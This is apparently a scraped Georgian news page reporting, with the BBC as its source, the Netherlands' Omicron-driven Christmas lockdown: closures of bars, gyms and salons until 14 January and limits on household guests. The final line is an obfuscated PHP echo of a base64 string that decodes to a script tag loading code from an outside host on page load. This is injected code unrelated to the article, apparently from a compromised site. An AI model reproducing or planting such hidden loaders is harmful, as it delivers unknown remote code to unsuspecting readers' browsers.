celsiusi
ავერსი საქკაბელი
ომიკრონის გამო ნიდერლანდებმა საშობაოდ ლოქდაუნი გამოაცხადა. ამის შესახებ BBC წერს.
 
ახალი შეზღუდვების ფარგლებში 14 იანვრამდე დაიხურება ბარები, სავარჯიშო დარბაზები, სილამაზის სალონები და სხვა არასასიცოცხლოდ მნიშვნელოვანი ობიექტები. სპორტული ღონისძიებები მაყურებლის გარეშე გაიმართება. ამასთან ყველანაირი სახის ღონისძიება, გარდა დაკრძალვისა, აიკრძალა. ასევე, შეიზღუდა სტუმრების მიღების რაოდენობაც, კერძოდ, თითო ოჯახს ერთდროულად მაქსიმუმ ორი სტუმრის მიღების უფლება ექნება, ხოლო დღესასწაულებზე მაქსიმუმ ოთხის. მოსახლეობას გარეთ გასვლისგან მაქსიმალური თავშეკავებისკენ მოუწოდებენ.
 
როგორც ნიდერლანდების პრემიერ-მინისტრმა, მარკ რუტემ განაცხადა, აღნიშნული ზომები გარდაუვალი გახდა ომიკრონის საფრთხის გამო.
 
ცნობისთვის, ევროპის მასშტაბით კოვიდ-რეგულაციები მკაცრდება, ვინაიდან კორონავირუსის ახალი შტამი სწრაფად ვრცელდება.
931
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");